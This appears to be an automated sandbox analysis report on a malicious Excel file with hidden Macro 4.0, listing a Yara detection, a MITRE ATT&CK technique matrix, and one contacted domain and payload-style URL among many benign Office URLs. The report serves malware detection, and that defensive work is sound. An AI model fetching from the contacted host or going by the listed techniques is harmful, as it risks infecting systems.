    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000002.00000002.225738540.00000000047E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000002.00000002.225738540.00000000047E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000002.00000002.225738540.00000000047E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000002.00000002.225738540.00000000047E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Document1094680387_02012021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    http://healthymachinery.com/health/32-422-76.assp0%Avira URL Cloudsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    healthymachinery.com
    104.21.29.200
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://healthymachinery.com/health/32-422-76.asspfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
        high
        https://login.microsoftonline.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
          high
          https://shell.suite.office.com:1443ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
              high
              https://autodiscover-s.outlook.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                  high
                  https://cdn.entity.ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                    high
                    https://wus2-000.contentsync.ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                        high
                        https://powerlift.acompli.netABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                          high
                          https://cortana.aiABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                    high
                                    https://api.aadrm.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                          high
                                          https://cr.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControlABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/OfficeABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                high
                                                https://graph.ppe.windows.netABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.netABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplateABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://wus2-000.pagecontentsync.ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplateABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetectABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                high
                                                                https://graph.windows.netABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/apiABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                    high
                                                                    https://www.cloudflare.com/5xx-error-landing32-422-76[1].htm.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetectABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                            high
                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                              high
                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                high
                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                  high
                                                                                  http://weather.service.msn.com/data.aspxABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                    high
                                                                                    https://apis.live.net/v5.0/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                      high
                                                                                      https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                          high
                                                                                          https://management.azure.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                            high
                                                                                            https://incidents.diagnostics.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                              high
                                                                                              https://clients.config.office.net/user/v1.0/iosABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                high
                                                                                                https://insertmedia.bing.office.net/odc/insertmediaABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                  high
                                                                                                  https://o365auditrealtimeingestion.manage.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                      high
                                                                                                      https://api.office.netABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                        high
                                                                                                        https://incidents.diagnosticssdf.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                          high
                                                                                                          https://asgsmsproxyapi.azurewebsites.net/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                            high
                                                                                                            https://entitlement.diagnostics.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                    high
                                                                                                                    https://templatelogging.office.com/client/logABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                        high
                                                                                                                        https://webshell.suite.office.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                              high
                                                                                                                              https://ncus-000.contentsync.ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://login.windows.net/common/oauth2/authorizeABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                high
